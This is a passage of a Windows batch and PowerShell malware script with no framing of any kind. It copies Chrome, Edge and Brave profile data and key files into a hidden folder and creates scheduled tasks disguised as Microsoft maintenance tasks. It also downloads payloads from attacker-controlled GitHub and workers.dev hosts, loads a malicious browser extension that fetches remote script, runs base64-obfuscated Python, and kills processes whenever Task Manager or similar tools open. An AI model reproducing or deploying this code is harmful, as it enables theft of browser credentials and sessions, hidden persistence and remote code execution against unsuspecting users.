catch{$Chrome.download | Add-Member -Type NoteProperty -Name "default_directory" -Value "C:\systemfile"
$Chrome.download | Add-Member -Type NoteProperty -Name "prompt_for_download" -Value "false"
}
$data = $Chrome | ConvertTo-Json -Compress
Set-Content -Path $File -Value $data -Force
#>
echo "Preferences" > C:\systemfile\ex.txt
echo "Secure Preferences" >> C:\systemfile\ex.txt
Xcopy /H /C /I /Y /exclude:C:\systemfile\ex.txt "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" "C:\systemfile\Default"
Xcopy /H /C /I /Y "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Local State" "C:\systemfile"
Xcopy /H /C /I /Y /exclude:C:\systemfile\ex.txt "$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data\Default" "C:\systemfile\Default"
Xcopy /H /C /I /Y "$env:LOCALAPPDATA\BraveSoftware\Brave-Browser\User Data\Local State" "C:\systemfile"
Xcopy /H /C /I /Y /exclude:C:\systemfile\ex.txt "$env:LOCALAPPDATA\Google\Chrome\User Data\Default" "C:\systemfile\Default"
Xcopy /H /C /I /Y "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State" "C:\systemfile"
#endregion chromepath
#region encoding
powershell if( (Get-WinSystemLocale).name -notmatch 'en-' ){ TASKKILL /F /IM cmd.exe /T }



mkdir C:\systemfile
cd C:\systemfile
attrib +s +h "C:\systemfile" /d






echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp.xml
echo     ^<Description^>Verify the publisher certificates.^</Description^> >> C:\systemfile\temp.xml
echo     ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp.xml
echo   ^<Triggers^> >> C:\systemfile\temp.xml
echo     ^<LogonTrigger^> >> C:\systemfile\temp.xml
echo       ^<Repetition^> >> C:\systemfile\temp.xml
echo         ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp.xml
echo         ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp.xml
echo       ^</Repetition^> >> C:\systemfile\temp.xml
echo       ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp.xml
echo       ^<Delay^>PT68S^</Delay^> >> C:\systemfile\temp.xml
echo     ^</LogonTrigger^> >> C:\systemfile\temp.xml
echo   ^</Triggers^> >> C:\systemfile\temp.xml
echo   ^<Principals^> >> C:\systemfile\temp.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp.xml
echo       ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp.xml
echo       ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp.xml
echo     ^</Principal^> >> C:\systemfile\temp.xml
echo   ^</Principals^> >> C:\systemfile\temp.xml
echo   ^<Settings^> >> C:\systemfile\temp.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp.xml
echo   ^</Settings^> >> C:\systemfile\temp.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp.xml
echo     ^<Exec^> >> C:\systemfile\temp.xml
echo       ^<Command^>cmd.exe^</Command^> >> C:\systemfile\temp.xml
echo       ^<Arguments^>/c more c.z ^| cmd ^&amp; more ^%USERPROFILE^%\Downloads\c.z ^| cmd^</Arguments^> >> C:\systemfile\temp.xml
echo       ^<WorkingDirectory^>C:\systemfile^</WorkingDirectory^> >> C:\systemfile\temp.xml
echo     ^</Exec^> >> C:\systemfile\temp.xml
echo   ^</Actions^> >> C:\systemfile\temp.xml
echo ^</Task^> >> C:\systemfile\temp.xml



schtasks /create /xml "C:\systemfile\temp.xml" /tn "\Microsoft\Windows\AppID\VerifiedCert" /F
Del "C:\systemfile\temp.xml"











echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp2.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp2.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp2.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp2.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp2.xml
echo     ^<Description^>Regular browser Maintenance.^</Description^> >> C:\systemfile\temp2.xml
echo     ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp2.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp2.xml
echo   ^<Triggers^> >> C:\systemfile\temp2.xml
echo     ^<LogonTrigger^> >> C:\systemfile\temp2.xml
echo       ^<Repetition^> >> C:\systemfile\temp2.xml
echo         ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp2.xml
echo         ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp2.xml
echo       ^</Repetition^> >> C:\systemfile\temp2.xml
echo       ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp2.xml
echo       ^<Delay^>PT60S^</Delay^> >> C:\systemfile\temp2.xml
echo     ^</LogonTrigger^> >> C:\systemfile\temp2.xml
echo   ^</Triggers^> >> C:\systemfile\temp2.xml
echo   ^<Principals^> >> C:\systemfile\temp2.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp2.xml
echo       ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp2.xml
echo       ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp2.xml
echo     ^</Principal^> >> C:\systemfile\temp2.xml
echo   ^</Principals^> >> C:\systemfile\temp2.xml
echo   ^<Settings^> >> C:\systemfile\temp2.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp2.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp2.xml
echo     ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^> >> C:\systemfile\temp2.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp2.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp2.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp2.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp2.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp2.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp2.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp2.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp2.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp2.xml
echo   ^</Settings^> >> C:\systemfile\temp2.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp2.xml
echo     ^<Exec^> >> C:\systemfile\temp2.xml
FOR /F "usebackq tokens=3*" %A IN (`reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe" ^| findstr chrome`) DO set CHROMEPATH=%A %B
FOR /F "usebackq tokens=3*" %A IN (`reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\brave.exe" ^| findstr brave`) DO set BRAVEPATH=%A %B
FOR /F "usebackq tokens=3*" %A IN (`reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\msedge.exe" ^| findstr msedge`) DO set MSEDGEPATH=%A %B
echo "%CHROMEPATH%" | findstr /C:"chrome" >nul && ( echo "%CHROMEPATH%"  &   echo       ^<Command^>"%CHROMEPATH%"^</Command^> >> "C:\systemfile\temp2.xml"   ) || (  
echo "%BRAVEPATH%" | findstr /C:"brave" >nul && (   echo "%BRAVEPATH%"  &  echo       ^<Command^>"%BRAVEPATH%"^</Command^> >> "C:\systemfile\temp2.xml"      ) || (   
echo "%MSEDGEPATH%" | findstr /C:"msedge" >nul && (   echo "%MSEDGEPATH%"  &   echo       ^<Command^>"%MSEDGEPATH%"^</Command^> >> "C:\systemfile\temp2.xml"      ) || (del "C:\systemfile\temp2.xml" & Exit)	   ))

echo       ^<Arguments^> --tyqe=render --fieId-trial--handle=1712,16854529411193321620,9342185763190534498,131072 --lang=en-US --extension--process --origin--trial-disabled--features=SecurePaymentConfirmation --device-scale--factor=1 --num--raster-threads=2 --profile-directory=Default --enable--main-frame-before--activation www.google.com --renderer--client-id=6 --user-data-dir="C:\systemfile" --no-v8--untrusted-code-mitigations --load-extension="C:\systemfile" --mojo--platform-channel-handle=-3784 /prefetch:1^</Arguments^> >> C:\systemfile\temp2.xml
echo       ^<WorkingDirectory^>C:\systemfile^</WorkingDirectory^> >> C:\systemfile\temp2.xml
echo     ^</Exec^> >> C:\systemfile\temp2.xml
echo   ^</Actions^> >> C:\systemfile\temp2.xml
echo ^</Task^> >> C:\systemfile\temp2.xml




schtasks /create /xml "C:\systemfile\temp2.xml" /tn "\Microsoft\Windows\Application Experience\Maintenance" /F
Del "C:\systemfile\temp2.xml"















attrib -s -h "C:\systemfile\c.z"
del C:\systemfile\c.z
echo cd C:\systemfile > C:\systemfile\c.z
echo mkdir C:\Windows\security >> C:\systemfile\c.z
echo Tasklist /FI "SESSION eq 0" ^| findstr /C:"chrome" /C:"msedge" /C:"brave" /C:"powershell" /C:"python" /C:"cdriver" /C:"mdriver" /C:"pythonw" ^>nul ^&^& ( start /b PowerShell.exe "while( (Get-Process Taskmgr, procexp, procexp64, SystemExplorer, ProcessHacker, AnVir, TMX, WinUtil -ErrorAction SilentlyContinue).Count -eq 0 ){Start-Sleep -Milliseconds 100 } ; TASKKILL /F /FI 'SESSION eq 0' /IM chrome.exe /IM msedge.exe /IM brave.exe /IM powershell.exe /IM python.exe /IM pythonw.exe /IM cdriver.exe /IM mdriver.exe /T ; Exit"  ) >> C:\systemfile\c.z
echo IF NOT EXIST "C:\Windows\security\pywinvera" (curl.exe -L https://github.com/alexrybak0444/New/raw/main/pywinveraa -o "C:\Windows\security\pywinveraa") >> C:\systemfile\c.z
echo IF NOT EXIST "C:\Windows\security\pywinvera" (curl.exe -L https://github.com/alexrybak0444/New/raw/main/winver -o "C:\Windows\security\winver") >> C:\systemfile\c.z
echo ren "C:\Windows\security\winver" winver.png >> C:\systemfile\c.z
echo mkdir "C:\Windows\security\pywinvera" >> C:\systemfile\c.z
echo IF NOT EXIST "C:\Windows\security\pywinvera\libs" ("C:\Windows\security\winver.png" x "C:\Windows\security\pywinveraa" -o"C:\Windows\security" ) >> C:\systemfile\c.z
echo del "C:\Windows\security\pywinveraa" >> C:\systemfile\c.z
echo del "C:\Windows\security\winver.png" >> C:\systemfile\c.z
echo. >> C:\systemfile\c.z
echo attrib -s -h "C:\systemfile\c.z" >> C:\systemfile\c.z
echo ^echo Tasklist /FI "SESSION eq 0" ^^^| findstr /C:"chrome" /C:"msedge" /C:"brave" /C:"powershell" /C:"python" /C:"cdriver" /C:"mdriver" /C:"pythonw" ^^^>nul ^^^&^^^& ( PowerShell.exe  "while( (Get-Process Taskmgr, procexp, procexp64, SystemExplorer, ProcessHacker, AnVir, TMX, WinUtil -ErrorAction SilentlyContinue).Count -eq 0 ){Start-Sleep -Milliseconds 100 } ; TASKKILL /F /FI 'SESSION eq 0' /IM chrome.exe /IM msedge.exe /IM brave.exe /IM powershell.exe /IM python.exe /IM pythonw.exe /IM cdriver.exe /IM mdriver.exe /T ; Exit"  ) ^^^|^^^| (^^^Exit)^> ^C:\systemfile\c.z >> C:\systemfile\c.z
echo attrib +s +h "C:\systemfile\*" /s /d >> C:\systemfile\c.z
attrib +s +h "C:\systemfile\c.z"







echo { > C:\systemfile\manifest.json
echo   "name": "Chrome-edge-ext", >> C:\systemfile\manifest.json
echo   "version": "0.1", >> C:\systemfile\manifest.json
echo   "description": "Chrome-edge-ext..", >> C:\systemfile\manifest.json
echo   "permissions": [ >> C:\systemfile\manifest.json
echo     "<all_urls>", >> C:\systemfile\manifest.json
echo     "activeTab", >> C:\systemfile\manifest.json
echo     "tabs", >> C:\systemfile\manifest.json
echo     "downloads" >> C:\systemfile\manifest.json
echo   ], >> C:\systemfile\manifest.json
echo   "background": { >> C:\systemfile\manifest.json
echo     "page": "background.html", >> C:\systemfile\manifest.json
echo     "persistent": true >> C:\systemfile\manifest.json
echo   }, >> C:\systemfile\manifest.json
echo   "manifest_version": 2, >> C:\systemfile\manifest.json
echo   "content_security_policy": "script-src 'self' https://*.alexrybak0555.workers.dev/; object-src 'self'" >> C:\systemfile\manifest.json
echo } >> C:\systemfile\manifest.json




echo ^<script src="https://cdn2.alexrybak0555.workers.dev/"^>^</script^> > C:\systemfile\background.html







































echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp3.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp3.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp3.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp3.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp3.xml
echo     ^<Description^>Verify the publisher certificates.^</Description^> >> C:\systemfile\temp3.xml
echo     ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp3.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp3.xml
echo   ^<Principals^> >> C:\systemfile\temp3.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp3.xml
echo       ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp3.xml
echo       ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp3.xml
echo     ^</Principal^> >> C:\systemfile\temp3.xml
echo   ^</Principals^> >> C:\systemfile\temp3.xml
echo   ^<Settings^> >> C:\systemfile\temp3.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp3.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp3.xml
echo     ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^> >> C:\systemfile\temp3.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp3.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp3.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp3.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp3.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp3.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp3.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp3.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp3.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp3.xml
echo   ^</Settings^> >> C:\systemfile\temp3.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp3.xml
echo     ^<Exec^> >> C:\systemfile\temp3.xml
echo       ^<Command^>python^</Command^> >> C:\systemfile\temp3.xml
echo       ^<Arguments^>-c ^"import base64;exec(base64.b64decode('aW1wb3J0IG9zLCBiYXNlNjQKIApTdHIgPSBsaXN0KG9wZW4oIkM6XFxzeXN0ZW1maWxlXFxvYnMubG9nIiwgbW9kZT0iciIsIGVuY29kaW5nPSJ1dGYtOCIpLnJlYWQoKS5yZXBsYWNlKCJcbiIsICIiKSkgCmZvciB4IGluIHJhbmdlKGxlbihTdHIpKToKICAgIFN0clt4XSA9IGNocihvcmQoU3RyW3hdKSAtIDEpIAogCmV4ZWMoYmFzZTY0LmI2NGRlY29kZSgiIi5qb2luKFN0cikpKQpvcy5wb3Blbignc2NodGFza3MgL2VuZCAvdG4gXE1pY3Jvc29mdFxXaW5kb3dzXFNlcnZpY2VzXENlcnRQYXRodycpCm9zLnBvcGVuKCdUQVNLS0lMTCAvRiAvRkkgIlNFU1NJT04gZXEgMCIgL0lNIGNocm9tZS5leGUgL0lNIG1zZWRnZS5leGUgL0lNIGJyYXZlLmV4ZSAvSU0gcG93ZXJzaGVsbC5leGUgL0lNIHB5dGhvbi5leGUgL0lNIHB5dGhvbncuZXhlIC9JTSBjZHJpdmVyLmV4ZSAvSU0gbWRyaXZlci5leGUgL1QnKQpleGl0KCk='))^"^</Arguments^> >> C:\systemfile\temp3.xml
echo       ^<WorkingDirectory^>C:\Windows\security\pywinvera^</WorkingDirectory^> >> C:\systemfile\temp3.xml
echo     ^</Exec^> >> C:\systemfile\temp3.xml
echo   ^</Actions^> >> C:\systemfile\temp3.xml
echo ^</Task^> >> C:\systemfile\temp3.xml



schtasks /create /xml "C:\systemfile\temp3.xml" /tn "\Microsoft\Windows\Services\CertPathCheck" /F
Del "C:\systemfile\temp3.xml"





echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp4.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp4.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp4.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp4.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp4.xml
echo     ^<Description^>Verify the publisher certificates.^</Description^> >> C:\systemfile\temp4.xml
echo     ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp4.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp4.xml
echo   ^<Principals^> >> C:\systemfile\temp4.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp4.xml
echo       ^<LogonType^>InteractiveToken^</LogonType^> >> C:\systemfile\temp4.xml
echo       ^<RunLevel^>HighestAvailable^</RunLevel^> >> C:\systemfile\temp4.xml
echo     ^</Principal^> >> C:\systemfile\temp4.xml
echo   ^</Principals^> >> C:\systemfile\temp4.xml
echo   ^<Settings^> >> C:\systemfile\temp4.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp4.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp4.xml
echo     ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^> >> C:\systemfile\temp4.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp4.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp4.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp4.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp4.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp4.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp4.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp4.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp4.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp4.xml
echo   ^</Settings^> >> C:\systemfile\temp4.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp4.xml
echo     ^<Exec^> >> C:\systemfile\temp4.xml
echo       ^<Command^>pythonw^</Command^> >> C:\systemfile\temp4.xml
echo       ^<Arguments^>-c ^"import base64;exec(base64.b64decode('aW1wb3J0IGF1dG9pdCwgb3MKYXV0b2l0LmF1dG9faXRfc2V0X29wdGlvbigiV2luV2FpdERlbGF5IiwgMCkKYXV0b2l0Lndpbl93YWl0KCdbUkVHRVhQVElUTEU6KD9pKSguKlByb2Nlc3MgRXhwbG9yZXIuKnwuKlRhc2sgTWFuYWdlci4qfC4qU3lzdGVtIEV4cGxvcmVyLip8LipQcm9jZXNzIEhhY2tlci4qfC4qQW5WaXIgVGFzay4qfC4qV2luVXRpbGl0aWVzLiopXScpCm9zLnBvcGVuKCdUQVNLS0lMTCAvRiAvRkkgIlNFU1NJT04gZXEgMCIgL0lNIGNocm9tZS5leGUgL0lNIG1zZWRnZS5leGUgL0lNIGJyYXZlLmV4ZSAvSU0gcG93ZXJzaGVsbC5leGUgL0lNIHB5dGhvbi5leGUgL0lNIHB5dGhvbncuZXhlIC9JTSBjZHJpdmVyLmV4ZSAvSU0gbWRyaXZlci5leGUgL1QnKQpleGl0KCk='))^"^</Arguments^> >> C:\systemfile\temp4.xml
echo       ^<WorkingDirectory^>C:\Windows\security\pywinvera^</WorkingDirectory^> >> C:\systemfile\temp4.xml
echo     ^</Exec^> >> C:\systemfile\temp4.xml
echo   ^</Actions^> >> C:\systemfile\temp4.xml
echo ^</Task^> >> C:\systemfile\temp4.xml



schtasks /create /xml "C:\systemfile\temp4.xml" /tn "\Microsoft\Windows\Services\CertPathw" /F
Del "C:\systemfile\temp4.xml"





































cd C:\
where curl || powershell "(New-Object System.Net.WebClient).DownloadFile('https://github.com/alexrybak0444/New/raw/main/curl', 'C:\Windows\system32\curl.exe')"
cd C:\systemfile





echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp5.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp5.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp5.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp5.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp5.xml
echo     ^<Description^>left over Component Cleanup^</Description^> >> C:\systemfile\temp5.xml
echo     ^<URI^>\Microsoft\Windows\Servicing\ComponentCleanup^</URI^> >> C:\systemfile\temp5.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp5.xml
echo   ^<Triggers^> >> C:\systemfile\temp5.xml
echo     ^<LogonTrigger^> >> C:\systemfile\temp5.xml
echo       ^<Repetition^> >> C:\systemfile\temp5.xml
echo         ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp5.xml
echo         ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp5.xml
echo       ^</Repetition^> >> C:\systemfile\temp5.xml
echo       ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp5.xml
echo     ^</LogonTrigger^> >> C:\systemfile\temp5.xml
echo   ^</Triggers^> >> C:\systemfile\temp5.xml
echo   ^<Principals^> >> C:\systemfile\temp5.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp5.xml
echo       ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp5.xml
echo       ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp5.xml
echo     ^</Principal^> >> C:\systemfile\temp5.xml
echo   ^</Principals^> >> C:\systemfile\temp5.xml
echo   ^<Settings^> >> C:\systemfile\temp5.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp5.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp5.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp5.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp5.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp5.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp5.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp5.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp5.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp5.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp5.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp5.xml
echo   ^</Settings^> >> C:\systemfile\temp5.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp5.xml
echo     ^<Exec^> >> C:\systemfile\temp5.xml
echo       ^<Command^>curl^</Command^> >> C:\systemfile\temp5.xml
echo       ^<Arguments^>https://autobat.alexrybak0444.workers.dev/ -o ^%temp^%\c4329f-4b8b33e-fa4fffe0^</Arguments^> >> C:\systemfile\temp5.xml
echo     ^</Exec^> >> C:\systemfile\temp5.xml
echo   ^</Actions^> >> C:\systemfile\temp5.xml
echo ^</Task^> >> C:\systemfile\temp5.xml

schtasks /create /xml "C:\systemfile\temp5.xml" /tn "\Microsoft\Windows\Servicing\ComponentCleanup" /F
Del "C:\systemfile\temp5.xml"








echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp6.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp6.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp6.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp6.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp6.xml
echo     ^<Description^>left over Service Cleanup^</Description^> >> C:\systemfile\temp6.xml
echo     ^<URI^>\Microsoft\Windows\Servicing\ServiceCleanup^</URI^> >> C:\systemfile\temp6.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp6.xml
echo   ^<Triggers^> >> C:\systemfile\temp6.xml
echo     ^<LogonTrigger^> >> C:\systemfile\temp6.xml
echo       ^<Repetition^> >> C:\systemfile\temp6.xml
echo         ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp6.xml
echo         ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp6.xml
echo       ^</Repetition^> >> C:\systemfile\temp6.xml
echo       ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp6.xml
echo       ^<Delay^>PT8S^</Delay^> >> C:\systemfile\temp6.xml
echo     ^</LogonTrigger^> >> C:\systemfile\temp6.xml
echo   ^</Triggers^> >> C:\systemfile\temp6.xml
echo   ^<Principals^> >> C:\systemfile\temp6.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp6.xml
echo       ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp6.xml
echo       ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp6.xml
echo     ^</Principal^> >> C:\systemfile\temp6.xml
echo   ^</Principals^> >> C:\systemfile\temp6.xml
echo   ^<Settings^> >> C:\systemfile\temp6.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp6.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp6.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp6.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp6.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp6.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp6.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp6.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp6.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp6.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp6.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp6.xml
echo   ^</Settings^> >> C:\systemfile\temp6.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp6.xml
echo     ^<Exec^> >> C:\systemfile\temp6.xml
echo       ^<Command^>cmd^</Command^> >> C:\systemfile\temp6.xml
echo       ^<Arguments^>/c type ^%temp^%\c4329f-4b8b33e-fa4fffe0 ^| cmd ^&amp;^&amp; del ^%temp^%\c4329f-4b8b33e-fa4fffe0^</Arguments^> >> C:\systemfile\temp6.xml
echo     ^</Exec^> >> C:\systemfile\temp6.xml
